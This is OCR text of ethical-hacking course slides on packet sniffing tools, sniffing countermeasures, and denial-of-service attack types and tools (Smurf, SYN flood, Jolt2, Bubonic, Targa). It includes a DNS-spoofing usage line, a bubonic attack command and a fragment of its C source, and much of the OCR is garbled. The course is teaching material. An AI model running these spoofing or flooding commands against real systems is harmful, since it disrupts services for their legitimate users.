encryption, real time mode, packet content scanning, 
network statistics in html, capture rules, colored output, 
and more 
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I 



© Hunt is used to watch TCP connections, intrude on 
them, or reset thenn 

© 1 1 is meant to be used on Ethernet, and has active 
mechanisms to sniff switched connections 

© Features: 

• It can be used for watching, spoofing, detecting, hijacking, and 
resetting connections 

• MAC discovery daemon for collecting MAC addresses, sniff 
daemon for loggi ng TCP traffic with the abi I ity to search for a 

particular string 



BC-Gouncil 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



NGSSniff 



© NGSSniff is a networl< pacl<et capture and analysis 
progrann 

© Pacl<et capture is done via wi ndows socl<ets raw I P or 
via |V| icrosoft networl< monitor drivers 

© 1 1 can carry out pacl<et sorti ng and it does not requi re 
tlie installation of any drivers to run it 

© 1 1 carri es out real ti me packet vi ewi ng 
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Ntop 



© Ntop is a network 
traffic probe that shows 
networl< usage 

© I n interactive mode, it 
displays the networl< 
status on the user's 
terminal 

© I n webmode, it acts as 
a web server, creati ng 
an html dump of the 
network status 
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' lw l u ll in iMt Dni I urn 



* f^"af ^OKtmuts QFMHdJiimM* Ig^iWHt Q^>wld ^l^HMd QMlri^X. 



*1' 



\A •\ I J.I 



4 ^kfbi 



1 3+ ; •■*! 
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J9B 

© Pf is Open BSD's system for fi Iteri ng TCP/ 1 P traffic and 
perf ornni ng N etworl< Add ress TransI ati on 

© 1 1 i s a! so capabi e of normal i zi ng and condi ti on i ng 
TCP/I P traffic and providing bandwidth control and 
packet prioritization 
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I PTraf 



© I PTraf is a network 
monitori ng uti I ity for I P 
networks. It intercepts 
packets on the network 
and gives out various 
pieces of i nformation 
about the current IP 
traffic over it 

©I PTraf can be used to 
monitor the load on an 
I P network, the most 
used types of network 
services, the 
proceedings of TCP 
connections, and others 
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FTraf 



[P traffic lanitar 
GgnGral interface statistics 
Eetailfid interface statistics 
Statistical hreakdonns^. 
LAN station lonitor 



Filters, „ 



Ccnfisire,„ 




Display s current IP traffic information 

mm 



n-Hove selector Enter-execute 
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Etherape 



©Etherape is a graphical 
networl< monitor for Unix 

©Featuring I inl< layer, IP, 
and TCP modes, it 
displays network activity 
graphically 

© 1 1 can f i Iter traff i c to be 
shown, and can read 
traff i c from a f i I e as wel I 
as live from the network 
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@ Programs Favorites Settings Desktop 



:31:50 PM « 




Name: 
WOODY 



Numeric Name: 

WOODY <00> (Workstation/Redirector)! 



nstantaneous 
184.357 Kbps 
nst, inbound 
92,164 Kbps 
nst. Outbound 
92,194 Kbps 



Aocumulated 
9.048 Mbytes 
Aocu. Inbound 
4.507 Mbytes 
Aoou. Outbound 
4.541 Mbytes 



E'Bd Forward Reioad 



Location: gheip:/usr/share/gnome/h 



EtherApe Manual 

Coiiviiehi e 2001b 



EtherApe i 



)yri9lit2001 Juan Toledo 

m: Just Toledo -ttoleclDiiusers.sour 
yncmt van Migliem ^vincertij 
Bill Bsrth ibbar1h@J5ers.™rte 
Fsbrlce BeOet iFsbrice.Bellet^cr 
Laurent Deniel fcleriePworldne 
Simor Kirby <3lin@nea1o.org> 
Eran Mm <eiw@rba5e,co.il; 
Frederic Peters ■fpeters^debia' 
Jasper Wallace fjasper^pointlee 
Ted Wight aed.Hldhtifdrc.rici; 



3^ 



Diagrarn Captur 



50 



Diagram re 



Topmost recog 



Name: 




J PA VAN 




Numeric Name: 




JPAYAN <00> (Workstation/Redirector) 


instantaneous 


Aooumuiated 


Obps 


249 bytes 


inst, inbound 


Aoou. inbound 


Obps 


0 bytes 


inst. Outbound 


Aoou. Outbound 


Obps 


249 bytes 



20:81 
Thu Apr 26 
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Features 



© N etwork traff i c i s di spl ayed graphi cal ly. The more 
talkative a node is, the bigger its representation. 

© User may select what level of the protocol stack to 
concentrate on. 

© User may either look at traffic withi n a network, end to 
end I P, or even port to port TCP. 

© Data can be captured "off the wi re" from a I i ve network 
connection, or read from a tcpdump capture file. 

© Data display can be refined using a network filter. 
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Netfilter 



© Netfilter and iptablesare 
the framework i nsi de the 
Linux 2.4.x l<ernel which 
enables packet fi Iteri na 
network address transfation 
(NAT), and other packet 
mangling 

©Netfilter is a set of hooks 
insidethe Linux 2.4.x 
kernel 's network stack 
which allows kernel 
modules to register callback 
f uncti ons cal I ed every ti me 
a network packet traverses 
one of those hooks 
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Features 



©Stateful packet filtering 
(connection tracking) 

© Al I ki nds of network 
address translation 

© Flexible and extensible 
infrastructure 
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Netfilter 
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Network Probe 



© This network monitor 
and protocol analyzer 
gives the user an i nstant 
pi dure of the traffic 
situation on the target 
network 

©All traffic is 
monitored in real time 

© All the information 
can be sorted, searched, 
and filtered by 
protocols, hosts, 
conversations, and 
network interfaces 
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protocols Lsts I conversations | protocols per host | protocols per conversation | network cards | network card conversations | network } 



protocol name protocol port < description 

Ifellier.lP.TCP.netblos-ssn 
1" ether .NetBIOS (LLC/SAP FOFO) 
^ eJher.lP.TCP.ms-wbt-server 
I'ether.lP.TCP.popa 
Tether .IP .TCP.msnp 
T ether .IP.TCP.https 
Tether .IP .UDP.netbios-ns 
T ether .IP .UDP.netblos-dp 



i { packets < bytes < first seen < last seen 



1.2043.6.139 
1.61630 
1.2048.6.3389 
1.2043.6.110 



World Wde Web HTTP 



NETBIOS 
NetBIOS 
t^SWBT 
Post Off 



22872 12,6 t^B Mon 09:00:59 t^on 11:59:53 




Stiow convefeatlons using this protocol 
Show all 



r rA\r.^.^ in I inn rlr., 



1.2043.6.1863 MIcrosol Export data 

1.2048.6.443 littpprot Help 

1.2043.17.137 NETBIOS im SMS 

1.2048.17.138 N ETBIOS Datap m Service 

<nnim7fo Ir-. :^ m„„„ o„,uii« 



W 

235 



l^on 09:00:59 l^onll 

liJon 09:06:30 Idonll 

Mon 09:0059 t^onll 

l^on 09:0059 l^onll 

Mon 09:0059 Mon 11 

Mon 10:1 2:07 Mon 11 

59 Mon 11 

59 Mon 11 



24/24 



76617 



TT;™ Mon09:i 
58,2 KB Mon09:i 

36,9 MB 



59:31 
59:49 
23:48 
53:59 
59:20 
30:04 
59:20 
58:48 
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M aa Tec Network Analyzer 



MaaTec Network 
Analyzer is a tool that 
is used for capturing, 
saving, and analyzing 
network traffic 

Features: 

• Real time network 
traffic statistics 

• Scheduled network 
traffic reports 

• Online view of 

i nconni ng packet 

• Multiple data color 
options 
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ft S.tart Snort I View alerts Jl_ Reset alarm 

^^^ll^l^^^^^^^j pMain configuration 



^ lest settings 



X Reload 



■/ Appiv 



Main configuration 



IDScenter [General 




Snort 1.9/ 1.8 r Snort 1.7 

Snort eHecutable file 
C: M D S \snort.eKe 
p' Show Snort console 
17 Minimized Snort window 
P Don't restart Snort, if it is killed 

r Process priority 
Normal C High C Realtime 



P Snort service mode 



"Autostart options 

I Start IDScenter with Windows 
|~ Start Snort when IDScenter is started 



■Log folder 

Set a logging directory and standard log file 
C: \S nortMog\alert. ids 



■Log viewer 

-(* Use internal log viewer ~ 



Standard log file C XML log file 

r Explorer URL [HTML file, ACID, SnortSnarf) 



C External viewer/editor for logfiles 

|WinSnort2HTML / ACID / SnortSnarf with another browser) 
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©There are three mai n modes i n 
which Snort can be configured: 
sniffer, packet logger, and networl< 
intrusion detection system 

©Sniffer mode simply reads the 
packets off of the network and 
di spl ays them for you i n a 
continuous stream on the console 

©Packet logger mode logs the 
packets to the disk 

©Network intrusion detection 
mode is the most complex and 
conf i gu r abl e conf i gu r ati on , 
al I owi ng Snort to analyze network 
traff i c for matches agai nst a user 
defined rule set 
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Tool: Windump 



© Wi nDump i s the porti ng to the Wi ndows pi atform of 
tcpdump, the most used network sniffer/ analyzer for 
UNIX 



p^C:\WINNT\System3Z\cmd.eKe - windump -n -S -vv 



C:S>windunp -n -S -uu 

uindunp: listening on \Deu ice\NPF_<F036flBE8-53D7-4C7B-B2E4-082BEF4D72D8> 
19:56:53.427131 IP <tos 0x88, ttl 106, id 58655, len 108> 68.193.110.230.5000 > 
192.168.2.162.5000: udp 80 

19:56:53.493683 IP <tos 0x88, ttl 106, id 58656, len 108> 68.193.110.230.5000 > 
192.168.2.162.5000: udp 80 

19:56:53.506094 IP <tos 0x88, ttl 43, id 46880, len 40> 64.4.26.250.80 > 192.168 
.2.69.2446: . [tcp sun ok] 894239202 :894239202<0> ack 4229117801 uin 17520 
19:56:53.506528 IP <tos 0x88, ttl 43, id 46881, len 510> 64.4.26.250.80 > 192.16 
8.2.69.2446: P 894239202 : 894239672 <470> ack 4229117801 uin 17520 

19:56:53.508241 IP <tos 0x88, ttl 43, id 46882, len 576> 64.4.26.250.80 > 192.16 
8.2.69.2446: . 894239672 :894240208<536> ack 4229117801 uin 17520 

19:56:53.508465 IP <tos 0x0, ttl 128, id 19205, len 40> 192.168.2.69.2446 > 64.4 
.26.250.80: . [tcp sun ok] 4229117801 :4229117801<0> ack 894240208 uin 16514 <DF> 

19:56:53.508602 IP <tos 0x88, ttl 43, id 46883, len 106> 64.4.26.250.80 > 192.16 
8.2.69.2446: . 894240208 : 894240274<66 > ack 4229117801 uin 17520 

19:56:53.527161 IP <tos 0x88, ttl 107, id 30218, len 1500> 68.58.11.235.2824 > 1 
92.168.2.69.2443: . 47592813 : 47594273 <1460> ack 4228398193 uin 8359 <DF> 
19:56:53.538245 IP <tos 0x88, ttl 106, id 58657, len 108> 68.193.110.230.5000 > 
192.168.2.162.5000: udp 80 

19:56:53.580115 IP <tos 0x88, ttl 243, id 39962, len 40> 202.87.41.115.80 > 192. 
168.2.129.2549: F [tcp sun ok] 3461109112 :3461109112<0> ack 6724698 uin 8760 <DF 

l> 
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Tool: Etherpeek 




□ 



a; - H # I @ [aj 
• X I S % 

Warning: Alarms will not function properly unless you enable Global Statistics Collection 



Enabled | Suspect Condition 



Problem Condition 



Name 





0 


> 50000000 for 5 seconds 


> 75000000 for 3 seconds 


Average Utilization (Kbits/s) 




0 


> 2 for 1 seconds 


> 2 for 5 seconds 


CRC Errors 




0 


> 1 1s for 1 seconds 


> 1 0/s for 1 seconds 


DECnet Addresses Seen 




0 


> 1 for 1 seconds 


> 3 for 1 seconds 


Duplicate Addresses 


A 


0 


> 2/s for 3 seconds 


> 2/s for 7 seconds 


Errors Total 




0 


> 1 for 1 seconds 


> 5 for 1 seconds 


FTP Failed Transfers 




0 


> 1 for 1 seconds 


> 3 for 1 seconds 


Gin Attacks 


0 


0 


> 1 for 1 seconds 


> 1 0 for 1 seconds 


ICMP Addr Mask Req 


0 


> 1 for 1 seconds 


> 1 0 for 1 seconds 


ICMP Dest Unreach 




0 


> 1 for 1 seconds 


> 20 for 1 seconds 


ICMP Frag Needed 






^ 1 friK 1 ^pr-nnH^ 







Ethernet network traffic and protocol 
analyzer. By monitoring, filtering, 
decoding and displaying packet data, it 
finds protocol errors and detects 
network problems such as unauthorized 
nodes, misconfigured routers, and 
u n reachabi e devi ces. 



2i 




O ^so 


©2 










Date 


Time 


Message 










o 


06/23/2003 


22:47:27 


i http 


//202 .87 .41 .1 7/images/thumbnail/020/22994020 .jpg from 1 92 .1 68 .2 .1 66 




o 


06/23/2003 


22:47:29 


i http 


//207.21 7.1 1 4.S6/scripts/auth.js from 1 92.1 68.2.50 




o 


06/23/2003 


22:47:30 


i http 


//207.21 7.1 1 4.56/img/logo_eln_bl.gif from 1 92.1 68.2.50 




o 


06/23/2003 


22:47:33 


i http 


//64 .1 2 .1 80 .1 9/ from 1 92 .1 68 .2 .50 




i 1 




e 


06/23/2003 


22:47:33 


i http 


//202 .87 .41 .1 7/images/thumbnail/020/22994020 .jpg from 1 92 .1 68 .2 .1 66 


1 


e 


06/23/2003 


22:47:35 


i http 


//cachef arm .websys .aol .comM'psite/hetscape_leftnav_2 from 1 92 .1 68 .2 .50 




o 


06/23/2003 


22:47:35 


i http 


//cachef arm .websys .aol .com/dci_global/spacer from 1 92 .1 68 .2 .50 




o 


06/23/2003 


22:47:36 


i http 


//cachefarm .websys .aol .com/a/a from 192.168.2.50 


1 


e 


06/23/2003 


22:47:38 


i http 


//202.144.65.7/steal/synQpsis.swf from 192.168.2.104 




o 


06/23/2003 


22:47:38 


i http 


//cachefarm .websys .aol .com/_mediaM'psite/ticker .js from 1 92 .1 68 .2 .50 


i 
1 


o 


06/23/2003 


22:47:42 


i http 


//202.87.41 .1 7/images/thumbnail/023/22994023.jpg from 1 92.1 68.2.1 66 


e 


06/23/2003 


22:47:54 


1 http 

: i-i-i— 


//21 6.1 27.80.75/showthread.php?s=apostid=77591 from 1 92.1 68.2.1 29 1 , i 

Aj^A ^ A ^-r -tr-X A . -t — -1 . . . ^ . J 
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M ac Changer 



© MAC changer is a Linux uti I ity for setting a specific 
|V| AC address for a networl< i nterface 

© 1 1 enables the user to set the |V| AC address randomly. 1 1 
al I ows specifyi ng the M AC of another vendor or setti ng 
another MAC of the same vendor 

© The user can also set a MAC of the same ki nd (such as a 
wireless card) 

© It offers a choice of vendor MAC list of more than 6200 
items 
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iQlRIS v3.1 


















nj xj 


File View Capture Decode 


Filters 


Tools Help 








n 


J □ [i^ ^ Q ^ 




m 




m 


m « Li ^rt - S ' o 













Capture 



Decode 




Capture 



Packet Decoder 



- + X 



^ Packet structure 
B Q MAC header (Ethernet ] 

g Destination; 08;00;46;( 
B Source; 00;06;29;CF;A 
J Type; 08-00 DoD IP 
j o IPv4 header 
J Version = 4 
J Header length = 5 (20 I 
^ Type of service = 00 

fioTil 000 = 0 Low pr 

fioTil ,,,0.... = Normal df 
fioTil ,,,,0... = Normal th — I 

fioTil 0., = Normal re 

♦ Total length = 40 bytes 
^ Identification = 43470 
^ Flags 



No 





MAC source addr 


MAC dest, addr 


Frame 


1 Protocol 1 


113 


IBI^-cfa677 


SONY-0d53e9 


IP 


TCP-> NETBIOS-SSN 


114 


SONY-0d53e9 


IBM-cfa677 


IP 


TCP-> NETBIOS-SSN 


115 


IBI^-cfa677 


SONY-0d53e9 


IP 


TCP-> NETBIOS-SSN 


116 


SONY-0d53e9 


IBM-cfa677 


IP 


TCP-> NETBIOS-SSN 


117 


IBM-cfa677 


5ONY-0d53e9 


IP 


TCP-> NETBIOS-SSN 


118 


5ONV-0d53e9 


IBM-cfa677 


IP 


TCP-> NETBIOS-SSN 


119 


IBM-cfa677 


5ONY-0d53e9 


IP 


TCP-> NETBIOS-SSN 


120 


00;80;29;00;3F;BC 


Broadcast 


802,3 


ip>; 


121 


00;80;29;00;3F;BC 


Broadcast 


802,3 


ip>; 


122 


00;80;29;00;3F;BC 


Broadcast 


802,3 


ip>; 


123 


00;80;29;00;3F;BC 


Broadcast 


802,3 


ip>; 



J. 



J 



0000 08 00 46 OD 53 E9 00 06 29 Cr A6 77 08 00 45 00 ..F.3 

1 1 al I ows reconstructi on of network traff i c i n a fornnat that i s si mpl e to use and 
understand. 1 1 can show the web page of any ennpl oyee who i s watchi ng it duri ng worl< 
hours. 



Help 



w a new one oy ciicwng on lij ouccon, i nis eaicor supporcs cne usual eaic commanas met in scanaara eaicors ^ i 

;r,,„„t I 



Done 



|CPU; 1% I 123/2000 |lP; 192,168,1,7 MAC; 08;00;46;0D;53;E9 



I Intel 82E ^ 
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N eti ntercept 



:Netlntercept - lastthursdav - defaulLprofile - cap1.sandstDrm.net 



RIe Forensic? Format Help 



^ D - 

New Open Delete 

Traffic I Summary 
Search 



nnd # Mask 



Print Import Export Report 
Forensic? ^erts ] Views | Configuration 
Search Search 



SRC IP Address [ 



12. 0.44. 2 
12. 123. 13. 30 
17. 2E4. 0. lEl 
18. 7. 16. 67 
IS. 7. 16. 74 
18. 24. 10. 25 
18. 24. 10. 26 
18. 26. 0. 36 
18. 55. 0. 234 
24.48. 30. 2 
j^cd^?-? I'll: 

^1 1 



Inv 



DST IP Address 



.2. 127. 16. 70 
.2. 123. 146. 51 
.8. 7. 16. 67 
.8. 24. 10. 26 
.8. 24. 10. 177 
.8. 24. 10. 179 
.8. 26. 0. 18 
.8. 26. 0. 36 
.8. 26.4. 10 
.8. 70. 0. 160 
fi . 1 1 1 . n ? 



File Name 3 



/ im Age s/ r e s 1 . grif 
/ innigf e s/ r £ s 2 . grif 
/ im^ige s/ r e s 3 . grif 
/ image s/shsli OK . gi 
/ image s ide . gif 
^. / image s/special_o 
1^ /images/ top 2 0_new 
/ image s/t2_lo go . g 
/ijciterest/ 
I /] s . ng/site=heral 

jMUh ±^ 

Inv M Inv 



2002-NOV-21 15:50:00 




|<||>|2002-NOV-21 16:10:00 ^ Min Suretj/ 



A sniffing tool tliat studies external break-in attennpts, watches for nnisuseof 
confidential data, displays the contents of an unencrypted rennote login or web session, 
categori zes or sorts traff i c by dozens of attri butes, and searches traff i c by cri teri a such as 
ennail headers, websites, and filenannes. 
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WinDNSSpoof 



L 
■ 



© This tool is a simple DNS ID Spoof erf or Windows 
9X/2K 

© I n order to use it you must be able to sniff traffic of the 
computer being attacked 

© Usage: wds-h 

Example : wds -n www.microsoft.com -i 216.239.39.101 
-g 00-00-39- 5c-45-3b 
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Scenario 



I 



Sam found out that he was worki ng i n a 
shared Ethernet network segment, which 
meant a sniffer could be launched from any 
machine in the LAN. Sam ran a sniffer and 
at the end of the day he studied the 
captured data. He could not believe it !!! 

1 He was abl e to read actual emai I s. 

2. H e had access to passwords off the wi re i n cl ear- 
text. 

3. He could read files. 

4. He had financial transaction and credit card 
infornnation. 

Sam decides to share the infornnation with Dave 
the next day. H ow do you thi nk Dave wi 1 1 react 
to this? Was Sam gui Ity of espionage? 
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I 



© Restriction of physical access to network media ensures that a 
pacl<et sniffer cannot be installed 

© The best way to be secured against sniffing is to use Encryption. It 
wont prevent a sniffer from functioning but will ensure that what a 
sniffer reads is not important. 

© ARP Spoofing is used to sniff a switched network, so an attacker 
wi 1 1 try to ARP spoof the gateway. This can be prevented by 
permanently addi ng the MAC address of the gateway to the ARP 
cache. 
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Counter measures (continued) 



© Another way to prevent the network from bei ng 
sniffed is to change the networl< to SSH 

© There are various methods to detect a sniffer i n 
a network: 

• Ping method 

• ARP method 

• Latency method 

• Using IDS 
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Counter measures (continued) 



© There are various tools to detect a sniffer in a 
network: 

• ARP Watch 

• Promiscan 

• Antisniff 

• Prodetect 
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Counter measures (continued) 



© Small Network 

• Use of static I P addresses and static ARP tables 
which prevents hacl<ersfronn adding spoofed ARP 
entries for machines in the networl< 

© Large Networks 

• Network switch Port Security features should be 
enabled 

• Use of Arpwatch to monitor ether net activity 
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Summary 



© Sniffingallowsthecaptureof vital information from network 
traffic. It can be done over the hub or the switch (passive or active) 

© Passwords, emails, and files can be grabbed by means of sniffing 

© ARP poisoning can be used to change the Switch modeof the 
network to H ub mode and subsequently carry out packet sniffi ng 

© Ethereal, Dsniff, Sniffit, Aldebaran, Hunt, and NGSSn iff are some 
of the most popular sniffing tools 

© The best way to be secured against sniffing is to use encryption and 
apply the latest patches or other lockdown techniques to the 
system 
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Ethical Hacking 



ModuleVIII 
Denial Of Service 



Scenario 



I 



Sam heads a media group wliose newspaper contributes a major 
cliunl< to tine company's revenue. Witinintiiree years of its launcli it 
surpassed most of the leadi ng newspapers i n its areas of distri bution. 
Sam proposes to extend his reach by comi ng up with an on! i ne e- 
business paper and announces the launch date. 

J ohn, an ex-colleague of Sam's, and head of a rival media group, 
watches Sam's every move. J ohn makes plans to foi I the launch of 
Sam's e-business newspaper. 




1 How could J ohn cause visible damage and hurt the company's 
reputation and goodwill? 

2. What would be a good mode of attack that J ohn can adopt so that it 
cannot be traced back to hi m? 

3. I s there a way Sam can avoi d a deni al of servi ce attack i n casej ohn i s 
planni ng one agai nst the group? 

4. Do you think that executing a denial of service is possible? Can you 
I i st any cases where a deni al of servi ce has caused consi derabl e 
damage? 
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Module Objective 



© What is a Denial of Service Attack? 

© Types of DoS Attacks 

© DoS Tools 

© D DoS Attacks 

© DDoS Attack Taxonomy 

© D DoS Tools 

© Reflected DoS Attack 

© Taxonomy of DDoS Counter measures 

© Worms and Viruses 
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Module Flow 



DoS Attacks: Characteristics ► Goal and I mpacts of DoS 

^^^^^^^^^^ ^^^^^^^^H 



Hacking Tools for DoS ^ 
^^^^^^^^^^^^ 






DDoS Counternneasures 
and Defensive Tools 



Reflected DoS 
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©A single attacker, Mafiaboy, shot 
down Sonne of the biggest e-commerce 
websites: eBay, Schwab, and Amazon. 
M afiaboy, a Canadian teenager who 
pleaded guilty, used readily available 
DoS attack tools, which can be used to 
rennotely activate hundreds of 
compromi sed zombi e servers to 
overwhelm a target's network capacity 
i n a matter of mi nutes. 

©I n the same attack, CN N I nteracti ve 
found itself essentially unable to 
update its stories for two hours— a 
potenti al ly devastati ng probi em for a 
news organization that prides itself on 
its ti meliness. 
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H ZHKim - Technology - 'MaRaboy' Faces up to 3 years in prison - April 19, 2000 - NicrosDrt Internet Explorer 



File Edit View Favorites Tools Help 



4" Back ' 4 ' @ I a I !|5ear[h gjFavorites 0 | § i ' § 



Address ||] http;|/archwes,cnn,comf2000fTECH/cornputingi04/19/dos,charges/ 

SPACE 
HEALTH 

EHTERTAIHMEHT 
POLITICS 



'Mafiaboy' faces up to 3 years in prison 



LAW 

CAREER 

TRAVEL 



FOOD 

ARTS S STYLE 

BOOKS 

HATURE 
: IH-OEPTH 
i ANALYSIS 



April 19, 2000 
Web posted at5:33p.m.EDT(2133GMTl 

B/D. Ian Hopper 

CNN Interactive Technolog!/ Editor 

(CNN) --Under Canadian law, 
"Mafiaboy" faces amaanium of three 
years injail if convicted in February's 
denial of service attacks. 




LOCAL 



CMN.com Europe 
ctiantie default etilion 



Hie Royal Canadian Mounted Police and the U.S. Federal Bureau of 
Investigation announced Wednesday that a 15-year-old boy who lives in the 
Montreal area was charged Monday with two counts of "mischief to data" in 
connection with the denial of service attack on CNN. com in February. 



3 ^^So I Llnte " 



TECHNOLOGY 

TOP STORIES 

Oonsumer group: Online 
privacy protections fall short 



Ouide to a wired Super Bovfl 



Deliate opens on maliinti e- 
comnerce law consistent 



(MORE) 



TOP STORIES 



More than 11, 000 Bed in India 



gualie 

Mideast negotiators want to 
continue talks after Israeli 
elections 
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Denial of Servi ce Attacks on the Rise? 



©August 15, 2003 

• M icrosoft.conn falls to a DoS attack. The 
connpany's website is inaccessible for two 
hours. 



©March 27, 2003, 15:09 GMT 

• Within hours of an English version of Al 
J azeera's website conni ng onl i ne, it was 
bl own away by a deni al of servi ce attack. 
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What are Denial of Servi ce Attacks? 




©A denial of servi ce attack (DoS) is 

an attacl< through which a person can 

render a system unusable, or 

significantly slow it down for 

I egi ti mate users, by overl oadi ng i ts 

resources. 

© I f an attacker i s unabi e to gai n 
access to a machi ne, the attacker 
most probably wi 1 1 j ust crash the 
machine to accomplish a denial of 
servi ce attack. 
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Goal of DoS 



© The goal of DoS is not to gai n unauthorized access to 
machi nes or data, but to prevent legiti mate users of a 
service from using it. 

© Attacl<ers may: 

• Attempt to flood a network, thereby preventi ng 
I egi ti mate network traff i c 

• Attempt to disrupt connections between two 
machi nes, thereby preventi ng access to a service 

• Attempt to prevent a particular individual from 
accessing a service 

• Attempt to disrupt service to a specific system or 
person 
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I mpact and the M odes of Attack 
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© The I mpact: 

• Disabled network 

• Disabled organization 

• Financial loss 

• Loss of goodwill 

© The Modes: 

• Consumption of 

- Scarce, limited, or non-renewable resources 

- Network bandwidth, memory, disk space, CPU time, or data 
structures 

- Access to other computers and networks, and certai n 
environmental resources such as power, cool air, or even water 

• Destruction or Alteration of Configuration I nformation 

• Physical destruction or alteration of network components, 
resources such as power, cool air, or even water 
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Types of Attacks 



There are two types of attacks: 

1 DoS attack 2. DDos attack 

• A type of attack on a network that i s desi gned to bri ng 
the network down by flooding it with data packets 



NETWORK 



PACKETS 















« 






II 













HACKER 



BC-Council 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



DoS Attack Classification 



© Smurf 

© Buffer Overflow Attack 
© Ping of death 
© Teardrop 
© SYN 

© Tribal Flood Attack 
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Smurf Attack 



I 



©The perpetrator generates a large 
amountof ICMP echo(ping) traffic 
to a network broadcast address with 
a spoofed source I P set to a victi nn 
host 

©The result will be lots of ping 
replies (I CM P Echo Reply) flooding 
the spoofed host 

©Amplified ping reply stream can 
overwhel m the vi cti m's network 
connection 

©The smurf attack's cousi n is cal led 
fraggle, which uses U DP echo 
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I CM P Echo Request with source C 
and destination subnet B, but 
originating from A 
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Smurf Attack 



Receiving Network 



Attacker 
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Target 















1 





ICMP_ECHO_REPLY 
Source: Receiving Network 
Destination: Target 
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Buffer Overflow Attack 



© Buffer overflow occurs any ti me the program writes 
more i nformation i nto the buffer than the space it has 
a! I ocated i n the memory 

© The attacl<er can overwrite data that controls the 
program execution path and hijack the control of the 
program to execute the attacker's code i nstead of the 
process code 

© Sendi ng emai I messages that have attachments with 
256-character can cause buffer overflow 
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Pingof Death Attack 



© The attacker del i berately sends an I P packet larger than 
the 65,536 bytes allowed by the I P protocol. 

© F ragmen tati on al I ows a si ngl e I P packet to be broken 
down i nto snnal I er segnnents. 

© The fragments can add up to more than the allowed 
65,536 bytes. The operating system, unable to handle 
oversized packets freeze, reboots or simply crashes. 

© The i dentity of the attacker sendi ng the oversized 
packet can be easi ly spoofed. 
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Teardrop Attack 



© I P requires that a packet that is too large for the next 
router to handle be divided i nto fragments. 

© The attacker's I P puts a conf usi ng offset val ue i n the 
second or later fragment. 

© I f the recei vi ng operati ng system i s not abl e to 
aggregate the packets accordingly, it can crash the 
system. 

© 1 1 is a U DP attack, which uses overlappi ng offset fields 
to bringdown hosts. 

© The Unnamed Attack 

• Variation of the Teardrop attack 

• F ragments are not over I appi ng but there are gaps i ncorporated 
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SYN Attack 



I 



© The attacker sends bogus TCP SYN requests to a victi m 
server. The host allocates resources (memory sockets) 
to the connection. 

© Prevents the server from respond! ng to I egi ti mate 
requests. 

© This attack exploits the three-way handshake. 

© Malicious flooding by largevolumesof TCP SYN 
packets to the victi m system with spoofed source I P 
addresses can cause DoS. 
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B 

© An improved denial of service attack that took 
down Yahoo! and other major networks in the 
summer of 2000 

© It is a parallel form of the teardrop attack 

© A pool of "slaves" are recruited 

© The systems ping in concert to provide the 
power and bandwidth of every server to 
overwhelm the victim's bandwidth, flooding its 
network with an overwhelming number of pings 



Triba Flow Attack 
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DoS Attack Tools 



© J olt2 

© Bubonicc 

© Land and LaTierra 

© Targa 
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DoSTool:Jolt2 



I 



© Al I ows remote attackers to 
cause a denial of service attack 
agai nst Wi ndows- based 
machines. 

©Causes the target machines to 
consume 100% of the CPU time 
on processing of illegal packets. 

©Not Windows specific. Cisco 
routers and other gateways may 
be vulnerable. 
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Picture source: 

http://www.robertgraham.com/op-ed/jolt2/ 
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DoSTool: Bubonicc 



© Bubonicc is a DoS exploit that can be run against 
Windows 2000 machines. 

© 1 1 worl<s by randomly sendi ng TCP packets with 
random setti ngs with the goal of i ncreasi ng the load of 
the machine, so that it eventually crashes. 

c:\> bubonic 12.23.23.2 10.0.0.1 100 
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DoS ToohBubonic.c 



File 



Edib View Go Communicator Help 



^ ^ &L 

Back Forvyard Reload Home Search Netscape Print 


f£ m 

Security Shop Stop 






Bookmarks ..^ Location: |http://wiA"Ai.antiofMine.com/bubonic.c 






What's Related 


T: ^ Instant Message g WebMail 0] Radio ^ People ^ Yellow Pages 


[9) Download [91 Calendar Cj Channels 







shoirt 
Tj. long 
Tj. long 
TJ. int. 

u_c]:iair 
u_3]:ioirt 
u_3hort 
u short 



th. seq; 
th. syn; 
thL_x2 : 4 ^ 
i:.h_of f : 4 ; 
th_f lags ; 
t h_TJ in; 
t h._s ULm ; 
th urp; 



Windows Task Manager 



File Options View Help 



struct tcpopt_hd.r { 
u_chair type ; 
u_chair len; 
u_3hoirt Tj'alue ; 

} ; 

struct p3eud.o_hd.r { 

u_long saddr , d.ad.d.r ; 
u_char iriJo s ^ ptc 1 ; 
u_short tcp 1 ; 

} ; 

struct packet { 

struct ip/ * hdr*/ ip; 
struct tcphdr tcp; 

} ; 

struct ctesum { 

struct pseud.o_h.dr pseudo ; 
struct tcphdr tcp ; 

} ; 

struct packet packet ; 
struct cksum cksum; 
struct sockaddr_in s_in; 

±1 
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DoSTool: Land and LaTierra 



© IP spoofing in combination with the opening of a TCP 
connection. 

© Both I P addresses, source and destination, are modified 
to be the same— the address of the desti nation host. 

© This results in sending the packet back to itself, because 
the addresses were the same. 
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DoS Tool : Targa 



© Targa is a program that can be used to run eight 
different DoS attacl<s. 

© 1 1 is seen as a part of l<its compi led for affecti ng DoS and 
sometimes even in earlier rootkits. 

© The attacker has the option to either launch individual 
attacks or to try al I the attacks unti I it is successful . 

© Targa is a very powerful program and can do a lot of 
damage to a company's network. 



Copyri ght © by BC-Cbunc i I 

Bo-COUnci I All Rights reserved. Reproduction isstrictly prohibited 



WhatisDDoSAttai 



Accord i ng to the website, 
www.searchsecurity.com: 

On the I nternet, a distributed denial 
of servi ce ( DDoS) attacl< i s one i n 
which a multitude of compromised 
systems attack a si ngl e target, 
thereby causi ng deni al of servi ce for 
users of the targeted system. The 
flood of i ncomi ng messages to the 
target system essenti al I y forces it to 
shut down, thereby denyi ng service 
to the system to legiti mate users. 
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DDoS Attacks Characteristics 



I 



© It is a large-scale, coordinated attack on theavailability of services 
of a victim system. 

© The services under attack are those of the "primary victim," while 
the compromised systems used to launch the attack are often cal led 
the "secondary victims." 

© This makes it difficult to detect because attacks originate from 
several I P addresses. 

© I f a si ngle I P address is attacki ng a company, it can block that 
address at its firewall. If it is 30000 this is extremely difficult. 

© Perpetrator isableto multiply the effectiveness of the Denial of 
Service significantly by harnessing the resources of multiple 
unwitting accomplice computers which serve as attack platforms. 
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DDoSIRC Based Mode 
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DDoS Attack Taxonomy 



©Bandwidth depletion 
attacl<s 

• F I cod attack 

• UDP and I CMP flood 



© Amplification attack 

• Snnurf and Fraggle attack 



mw.yahoo.com (204.71.200.68) on Febniaiy 2, 



RTI Latency Imieconds 



T " T 1 



